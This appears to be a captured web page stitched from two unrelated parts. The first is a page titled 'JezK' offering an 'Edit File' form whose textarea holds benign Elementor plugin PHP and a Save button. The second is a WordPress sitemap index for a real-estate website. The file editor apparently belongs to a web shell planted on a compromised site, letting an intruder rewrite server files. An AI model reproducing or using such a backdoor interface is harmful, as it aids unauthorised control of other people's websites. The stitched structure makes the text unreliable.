
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: template-library-global-classes.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace Elementor\Modules\GlobalClasses\Utils;

use Elementor\Core\Utils\Template_Library_Import_Export_Utils;

if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit;
}

class Template_Library_Global_Classes {

	public static function add_global_classes_snapshot( array $snapshots, $content, $template_id, array $export_data ): array {
		if ( ! is_array( $content ) ) {
			return $snapshots;
		}

		if ( ! empty( $snapshots[&#039;global_classes&#039;] ) ) {
			return $snapshots;
		}

		$snapshot = Template_Library_Global_Classes_Snapshot_Builder::build_snapshot_for_elements( $content );

		if ( ! empty( $snapshot ) ) {
			$snapshots[&#039;global_classes&#039;] = $snapshot;
		}

		return $snapshots;
	}

	public static function extract_global_classes_from_data( array $snapshots, array $decoded_data, array $data ): array {
		$snapshot = $decoded_data[&#039;global_classes&#039;] ?? null;

		if ( ! empty( $snapshot ) &amp;&amp; is_array( $snapshot ) ) {
			$snapshots[&#039;global_classes&#039;] = $snapshot;
		}

		return $snapshots;
	}

	public static function process_global_classes_import( array $result, string $import_mode, array $data ): array {
		$snapshot = $data[&#039;global_classes&#039;] ?? null;

		if ( empty( $snapshot ) || ! is_array( $snapshot ) ) {
			return $result;
		}

		$snapshot = apply_filters(
			&#039;elementor/global_classes/import/transform_snapshot&#039;,
			$snapshot,
			$import_mode,
			$result,
			$data
		);

		$processed = Template_Library_Import_Export_Utils::process_import_by_mode(
			$import_mode,
			$result[&#039;content&#039;],
			$snapshot,
			[ Template_Library_Global_Classes_Snapshot_Builder::class, &#039;merge_snapshot_and_get_id_map&#039; ],
			[ Template_Library_Global_Classes_Snapshot_Builder::class, &#039;create_snapshot_as_new&#039; ],
			[ Template_Library_Global_Classes_Element_Transformer::class, &#039;rewrite_elements_classes_ids&#039; ],
			[ Template_Library_Global_Classes_Element_Transformer::class, &#039;flatten_elements_classes&#039; ]
		);

		$result[&#039;content&#039;] = $processed[&#039;content&#039;];
		$result[&#039;updated_global_classes&#039;] = $processed[&#039;operation_result&#039;][&#039;global_classes&#039;] ?? null;
		$result[&#039;classes_to_flatten&#039;] = $processed[&#039;ids_to_flatten&#039;];

		return $result;
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://www.mijikendarealestate.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-property-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-agent-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-ube_content-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-type-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-status-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-feature-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-label-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-state-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-city-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-neighborhood-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-agency-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
